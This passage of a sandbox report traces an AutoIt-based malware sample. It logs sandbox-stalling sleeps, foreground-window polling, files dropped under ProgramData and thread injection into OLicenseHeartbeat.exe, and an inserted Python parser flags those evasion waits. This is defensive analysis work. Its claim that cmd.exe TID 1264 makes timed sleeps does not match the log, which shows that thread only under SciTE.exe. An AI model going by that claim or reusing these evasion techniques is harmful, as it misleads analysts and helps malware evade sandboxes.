            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5092 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6680 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7020 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 8012 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7500 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5088 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5796 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7672 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7944 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6716 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7936 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 2788 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7980 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8088 | Thread sleep count: 144 > 30
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8076 | Thread sleep count: 521 > 30
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -53266s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -100936s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -47690s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -98379s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -74299s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -98773s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -35309s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -34527s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -78150s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -70488s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -66239s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -73944s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -68690s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -34428s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -87931s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -90734s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -98794s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -90071s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -92014s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -70098s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -118782s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -68075s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -98860s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -101240s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -52037s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -32379s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -76502s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072 | Thread sleep time: -118775s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7788 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7092 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1460 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7892 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7964 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1264 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7852 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7924 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7952 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2144 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7340 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7808 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 6080 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2452 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5472 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7968 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7524 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5484 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe TID: 3612 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7160 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 4120 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 3192 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7108 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7412 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7688 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7236 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7096 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7120 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 occurrences)
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe | Last function: Thread delayed
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI3433.tmp
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe | Thread delayed: delay time: 922337203685477 (13 occurrences)
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 922337203685477 (18 occurrences)
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe | Thread delayed: delay time: 922337203685477 (9 occurrences)
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Window / User API: threadDelayed 521
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Window / User API: foregroundWindowGot 827
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Window / User API: foregroundWindowGot 832
            Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_004517BC GetSystemInfo, 9_2_004517BC
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_004089B0 FindFirstFileA, 9_2_004089B0
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00408AB8 FindFirstFileA, 9_2_00408AB8
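The wait values in these lines are the relative timeout handed to NtDelayExecution, printed with its negative sign. The "s" suffix should not be read literally: the magnitude is best read as milliseconds (an assumption, but -922337203685477 equals INT64_MIN divided by 10^4, which is exactly a 100-ns timeout of "never" converted to ms, and -30000 then matches a 30 s threshold). That split matters for reading the section. OLicenseHeartbeat.exe, msinfo32.exe, MyProg.exe and most SciTE.exe threads report only the infinite value, which is what worker threads parked on an event look like, while cmd.exe (TID 1264) performs nine timed sleeps of 33 to 119 s, about 9 minutes in total, and SciTE.exe TID 8072 a further 28 of them, alongside 521 short sleeps in a loop and 827 and 832 polls of the foreground window. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses the Thread sleep time, Thread delayed, Thread sleep count and Window / User API lines, normalises the timeouts, and reports per process which waits look like stalling or user-presence checks. The millisecond reading, the cumulative threshold of 180 s and the foreground-poll threshold of 100 are assumptions; the 30 000 ms and 30-call thresholds are the report's own. The sample is constructed from values in this section.

```python
import re
from collections import defaultdict

# A 100-ns NtDelayExecution timeout of INT64_MIN, printed in milliseconds, is how
# an "infinite" wait shows up in the report: |INT64_MIN| // 10_000 == 922337203685477.
INFINITE_MS = (1 << 63) // 10_000
LONG_SLEEP_MS = 30_000       # the report's own per-call threshold (the "-30000" in each line)
TOTAL_SLEEP_MS = 180_000     # assumed: cumulative timed waiting that would stall a short sandbox run
LOOP_THRESHOLD = 30          # the report's own threshold for "Thread sleep count"
FG_POLL_THRESHOLD = 100      # assumed: GetForegroundWindow calls that look like a user-activity check

PROC_RE = re.compile(r"Source:\s*(.+?\.exe)", re.IGNORECASE)
SLEEP_RE = re.compile(r"Thread sleep time:\s*(-?\d+)s")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
FGWIN_RE = re.compile(r"foregroundWindowGot\s+(\d+)")

# Constructed sample in the report's own wording (values taken from the lines above).
SAMPLE = r"""
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 Thread sleep time: -42141s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 Thread sleep time: -119333s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 Thread sleep time: -38013s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8076 Thread sleep count: 521 > 30
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Window / User API: foregroundWindowGot 827
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 42141
"""

def wait_ms(raw):
    """Normalise a reported timeout. The sign is the NtDelayExecution 'relative'
    convention and the magnitude is milliseconds (assumption; the INT64_MIN/10^4
    value implies it). Returns None for an effectively infinite wait."""
    ms = abs(int(raw))
    return None if ms >= INFINITE_MS else ms

def summarize(text):
    """Per-process aggregation. The report lists each timed wait twice ('Thread
    sleep time' with a TID, and 'Thread delayed'), so the two forms are kept
    apart instead of being summed together."""
    stats = defaultdict(lambda: {"sleep_time": [], "delayed": [], "loops": 0, "fg_polls": 0})
    for line in text.splitlines():
        m = PROC_RE.search(line)
        if not m:
            continue
        s = stats[m.group(1)]
        s["sleep_time"] += [wait_ms(r) for r in SLEEP_RE.findall(line)]
        s["delayed"] += [wait_ms(r) for r in DELAY_RE.findall(line)]
        s["loops"] += sum(int(r) for r in COUNT_RE.findall(line))
        s["fg_polls"] += sum(int(r) for r in FGWIN_RE.findall(line))
    return dict(stats)

def assess(text, total_threshold_ms=TOTAL_SLEEP_MS):
    """Return {process: [findings]} for processes whose waits look like stalling
    or user-presence checks. Processes that only ever block 'forever' (worker
    threads parked on an event) produce no finding."""
    out = {}
    for proc, s in summarize(text).items():
        waits = s["sleep_time"] or s["delayed"]      # prefer the TID-bearing form when both exist
        finite = [w for w in waits if w is not None]
        findings = []
        if finite and max(finite) >= LONG_SLEEP_MS:
            findings.append(f"single wait of {max(finite) / 1000:.1f} s")
        if sum(finite) >= total_threshold_ms:
            findings.append(f"cumulative timed waits {sum(finite) / 1000:.0f} s")
        if s["loops"] > LOOP_THRESHOLD:
            findings.append(f"{s['loops']} short sleeps in a loop")
        if s["fg_polls"] > FG_POLL_THRESHOLD:
            findings.append(f"GetForegroundWindow polled {s['fg_polls']} times: user-activity check")
        if findings:
            out[proc] = findings
    return out

if __name__ == "__main__":
    for proc, findings in assess(SAMPLE).items():
        print(proc, "->", "; ".join(findings))
```

Treating infinite waits as non-findings is a deliberate choice: a process that blocks forever on a handle is not delaying anything, whereas a thread that chains timed sleeps of a minute or two is spending the sandbox's budget on purpose, and a loop that keeps asking for the foreground window is waiting for a human.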
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 42141
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 119333
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 38013
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 47979
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 58022
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 33161
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 44923
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 40647
            Source: C:\Windows\SysWOW64\cmd.exe | Thread delayed: delay time: 117784
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe | Thread delayed: delay time: 922337203685477 (13 occurrences)
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 53266
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 100936
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 47690
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 98379
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 74299
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 98773
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 35309
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 34527
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 78150
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 70488
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 66239
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 73944
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 68690
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 34428
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 87931
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 90734
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 98794
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 90071
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 92014
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 70098
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 118782
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 68075
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 98860
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 101240
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 52037
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 32379
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 76502
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 118775
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Thread delayed: delay time: 922337203685477 (15 occurrences)
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\SysWOW64\expand.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\SysWOW64\cmd.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\ProgramData\fkeabad\Autoit3.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\
            Source: Autoit3.exe, 0000000D.00000002.596679945.0000000001A16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUp%j
            Source: cmd.exe, 0000000E.00000002.706196791.0000000003337000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
            Source: Autoit3.exe, 00000008.00000002.565947520.0000000001213000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00450514 mov eax, dword ptr fs:[00000030h] | 9_2_00450514
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00458B34 mov eax, dword ptr fs:[00000030h] | 9_2_00458B34
            Source: C:\ProgramData\fkeabad\Autoit3.exe | Memory protected: page write copy | page execute | page execute read | page execute and read and write | page execute and write copy | page guard | page no cache | page write combine

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: FF0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1260000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1320000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FA0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FE0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3020000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3060000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3120000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3160000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3220000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3260000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3320000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3360000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3420000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3460000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3520000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3560000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3620000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3660000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36A0000
